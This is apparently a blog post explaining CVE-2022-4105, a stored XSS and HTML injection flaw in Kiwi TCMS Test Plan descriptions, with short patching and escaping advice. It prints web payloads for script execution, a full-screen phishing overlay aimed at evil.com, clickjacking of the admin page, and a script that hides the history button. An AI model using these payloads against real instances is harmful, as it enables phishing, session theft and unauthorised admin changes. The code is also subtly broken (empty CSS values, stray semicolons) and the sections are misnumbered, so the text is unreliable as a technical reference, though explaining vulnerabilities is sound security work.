CVE-2022-4105 - Exploiting Stored XSS and HTML Injection in Kiwi Test Plan for Clickjacking Attacks

CVE-2022-4105 is a serious vulnerability found in Kiwi TCMS, a popular open-source test management system. Attackers can use a _stored Cross-Site Scripting (XSS)_ bug to run malicious JavaScript. This stored XSS, combined with HTML injection, opens the door for two powerful attacks: UI redressing (clickjacking) and breaking or disabling the History page for users.

This post explains the vulnerability in simple language, gives sample code, explains how the exploit works, and lists references for more technical details.

What’s The Vulnerability?

Stored XSS means an attacker can store a script (for example, JavaScript) in the application, and it will run whenever someone loads the page—not just in the attacker’s browser.

HTML injection happens when attackers can insert HTML code somewhere in the application. If output is not sanitized, this code is interpreted by users' browsers, letting attackers mess with page structure, hide elements, or trick users.

Combining these in Kiwi TCMS lets an attacker

- Execute arbitrary JavaScript code as the victim user, usually an authenticated user like a tester or admin.
- Change how the UI looks and behaves (UI redressing/clickjacking).
- Inject code to disable the history page, making it harder for users to track what's changed or rollback actions.

Where’s The Bug?

The problem is in how Kiwi TCMS handles Test Plan titles and descriptions. These values are not properly sanitized when shown, so injected scripts or HTML code can run.

Suppose an attacker creates or edits a Test Plan’s description to this value

<script>alert('XSS by attacker!')</script>

Whenever someone visits this Test Plan in Kiwi TCMS, the browser will show an alert box — proof the code is running!

But attackers can do much worse: they can steal session cookies, change test results, or trick admins.

HTML injection means attackers can also insert arbitrary HTML elements. For example

<h1>Hacked by EvilUser</h1>
<iframe src="https://evil.com/phishing"; style="width:100vw;height:100vh;position:fixed;top:;left:;opacity:.7;z-index:9999;"></iframe>

This can overlay something over the Kiwi TCMS page, or even trick users into entering their credentials into the attacker’s page.

### 3. UI Redressing / Clickjacking Attack

Because frames and HTML are not blocked, the attacker can use iframes and CSS to hide the real UI and show a fake one instead, leading to "clickjacking":

<div style="position:relative;z-index:100;">
  <button onclick="alert('You gave admin rights!')">Click here for free points!</button>
</div>
<iframe src="https://kiwitcms-instance.test/admin"; style="width:100vw;height:100vh;opacity:.01;position:absolute;top:;left:;z-index:200;"></iframe>

Now, when users believe they’re clicking the top button, they’re really clicking something else (like a "Delete" or "Grant admin" button) in their own Kiwi TCMS—without realizing it.

4. Disabling the History Page

Attackers can inject code to break navigation, making it *impossible* for users to review or roll back changes.

Here’s a simple trick

<script>
// Overwrite window.location or block navigation
window.onbeforeunload = function() { return "Page is broken!"; };
Object.defineProperty(window, 'location', { writable: false });
// Or hide the history button:
document.querySelector('.history-button').style.display = 'none';
</script>

Or, by injecting <style> blocks

<style>.history-link { display: none !important; }</style>

Always HTML-escape user input before displaying it.

- Use Content Security Policy (CSP) headers to block dangerous scripts/iframes.

References and More Info

- NVD entry for CVE-2022-4105
- Kiwi TCMS Security Advisories
- OWASP XSS Cheat Sheet
- OWASP Clickjacking
- How to secure test case management software

Conclusion

CVE-2022-4105 in Kiwi TCMS shows how dangerous stored XSS and HTML injection can be. Attackers can target all users of the system—often, test managers and developers controlling sensitive environments. Updating Kiwi TCMS to a fixed version and following secure coding practices closes these doors, but it’s a lesson for every web developer: sanitize all user input, always.


If you run Kiwi TCMS:  
Patch immediately, review any Test Plan text for suspicious edits, and audit for unknown admin activity.

If you're curious about more exploits:  
Dig into the references above, or try building a safe test copy of Kiwi TCMS to test these attacks (do NOT test against production or unknown systems).

Timeline

Published on: 11/21/2022 20:15:00 UTC
Last modified on: 11/23/2022 18:25:00 UTC